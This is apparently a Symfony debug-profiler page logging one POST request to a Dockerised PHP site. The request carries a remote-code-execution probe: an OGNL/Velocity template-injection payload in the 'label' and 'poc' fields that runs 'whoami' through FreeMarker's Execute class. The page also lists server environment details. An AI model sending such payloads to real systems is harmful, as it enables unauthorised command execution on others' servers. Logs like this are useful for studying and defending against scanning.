n/a
Request
GET Parameters
No GET parameters
POST Parameters
| Key | Value |
|---|---|
| label | "aaa\u0027+#request.get(\u0027.KEY_velocity.struts2.context\u0027).internalGet(\u0027ognl\u0027).findValue(#parameters.poc[0],{})+\u0027" |
| poc | "@org.apache.struts2.ServletActionContext@getResponse().setHeader(\u0027x_vuln_check\u0027,(new freemarker.template.utility.Execute()).exec({"whoami"}))\r\n" |
Request Attributes
No attributes
Request Headers
| Header | Value |
|---|---|
| accept-encoding | "gzip, deflate, br" |
| connection | "close" |
| content-length | "303" |
| content-type | "application/x-www-form-urlencoded" |
| host | "93.185.111.101:8000" |
| user-agent | "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36" |
| x-php-ob-level | 0 |
Request Content
label=aaa\u0027%2b#request.get(\u0027.KEY_velocity.struts2.context\u0027).internalGet(\u0027ognl\u0027).findValue(#parameters.poc[0],{})%2b\u0027&poc=@org.apache.struts2.ServletActionContext@getResponse().setHeader(\u0027x_vuln_check\u0027,(new+freemarker.template.utility.Execute()).exec({"whoami"}))
Server Parameters
| Key | Value |
|---|---|
| CONTENT_LENGTH | "303" |
| CONTENT_TYPE | "application/x-www-form-urlencoded" |
| DOCUMENT_ROOT | "/var/www/html/web" |
| DOCUMENT_URI | "/app_dev.php" |
| FCGI_ROLE | "RESPONDER" |
| GATEWAY_INTERFACE | "CGI/1.1" |
| GPG_KEYS | "A917B1ECDA84AEC2B568FED6F50ABC807BD5DCD0 528995BFEDFBA7191D46839EF9BA0ADA31CBD89E 1729F83938DA44E27BA0F4D3DBDB397470D12172" |
| HOME | "/var/www" |
| HOSTNAME | "033f66f89a30" |
| HTTP_ACCEPT_ENCODING | "gzip, deflate, br" |
| HTTP_CONNECTION | "close" |
| HTTP_CONTENT_LENGTH | "303" |
| HTTP_CONTENT_TYPE | "application/x-www-form-urlencoded" |
| HTTP_HOST | "93.185.111.101:8000" |
| HTTP_USER_AGENT | "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36" |
| PATH | "/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin" |
| PHPIZE_DEPS | "autoconf \t\tdpkg-dev \t\tfile \t\tg++ \t\tgcc \t\tlibc-dev \t\tmake \t\tpkg-config \t\tre2c" |
| PHP_ASC_URL | "https://www.php.net/get/php-7.1.33.tar.xz.asc/from/this/mirror" |
| PHP_CFLAGS | "-fstack-protector-strong -fpic -fpie -O2 -D_LARGEFILE_SOURCE -D_FILE_OFFSET_BITS=64" |
| PHP_CPPFLAGS | "-fstack-protector-strong -fpic -fpie -O2 -D_LARGEFILE_SOURCE -D_FILE_OFFSET_BITS=64" |
| PHP_EXTRA_CONFIGURE_ARGS | "--enable-fpm --with-fpm-user=www-data --with-fpm-group=www-data --disable-cgi" |
| PHP_IDE_CONFIG | "serverName=docker" |
| PHP_INI_DIR | "/usr/local/etc/php" |
| PHP_LDFLAGS | "-Wl,-O1 -Wl,--hash-style=both -pie" |
| PHP_MD5 | "" |
| PHP_SELF | "/app_dev.php" |
| PHP_SHA256 | "bd7c0a9bd5433289ee01fd440af3715309faf583f75832b64fe169c100d52968" |
| PHP_URL | "https://www.php.net/get/php-7.1.33.tar.xz/from/this/mirror" |
| PHP_VERSION | "7.1.33" |
| PWD | "/var/www/html" |
| QUERY_STRING | "" |
| REDIRECT_STATUS | "200" |
| REMOTE_ADDR | "194.165.16.71" |
| REMOTE_PORT | "45115" |
| REQUEST_METHOD | "POST" |
| REQUEST_SCHEME | "http" |
| REQUEST_TIME | 1753073417 |
| REQUEST_TIME_FLOAT | 1753073417.3478 |
| REQUEST_URI | "/template/aui/text-inline.vm" |
| SCRIPT_FILENAME | "/var/www/html/web/app_dev.php" |
| SCRIPT_NAME | "/app_dev.php" |
| SERVER_ADDR | "172.19.0.4" |
| SERVER_NAME | "" |
| SERVER_PORT | "80" |
| SERVER_PROTOCOL | "HTTP/1.1" |
| SERVER_SOFTWARE | "nginx/1.27.0" |
| USER | "www-data" |
| argc | 0 |
| argv | [] |
| docker | "true" |
Response
Response Headers
| Header | Value |
|---|---|
| cache-control | "no-cache, private" |
| content-security-policy | "default-src 'self' 'unsafe-inline';script-src 'self' 'unsafe-inline' 'unsafe-eval' code.jquery.com ajax.googleapis.com maps.googleapis.com maps.gstatic.com www.googletagmanager.com www.google-analytics.com ssl.google-analytics.com www.googleadservices.comstats.g.doubleclick.net googleads.g.doubleclick.net https://www.google.com/recaptcha/ https://www.gstatic.com/recaptcha/ c.seznam.cz;frame-src https://www.googletagmanager.com/ https://www.google.com/recaptcha/ https://www.google.com/maps/ https://www.rezidencesmichovcity.cz/ https://tour.vrspace.cz/ https://jobs.sloneek.com seznam.cz;style-src 'self' 'unsafe-inline' code.jquery.com fonts.googleapis.com c.seznam.cz;font-src 'self' 'unsafe-inline' data: fonts.gstatic.com;child-src 'self' 'unsafe-inline' www.google.com tour.vrspace.cz https://jobs.sloneek.com www.rezidencesmichovcity.cz;img-src 'self' data: www.googletagmanager.com www.google-analytics.com c.imedia.cz c.seznam.cz h.seznam.cz www.google.com www.google.cz stats.g.doubleclick.net;connect-src 'self' www.google-analytics.com stats.g.doubleclick.net;" |
| content-type | "text/html; charset=UTF-8" |
| date | "Mon, 21 Jul 2025 04:50:17 GMT" |
| location | "/pages/404" |
| strict-transport-security | "max-age=63072000" |
| x-content-type-options | "nosniff" |
| x-debug-token | "e57f4a" |
| x-frame-options | "DENY" |
| x-xss-protection | "1; mode=block" |
Cookies
Request Cookies
No request cookies
Response Cookies
No response cookies
Session
Session Metadata
No session metadata
Session Attributes
No session attributes
Flashes
Flashes
No flash messages were created.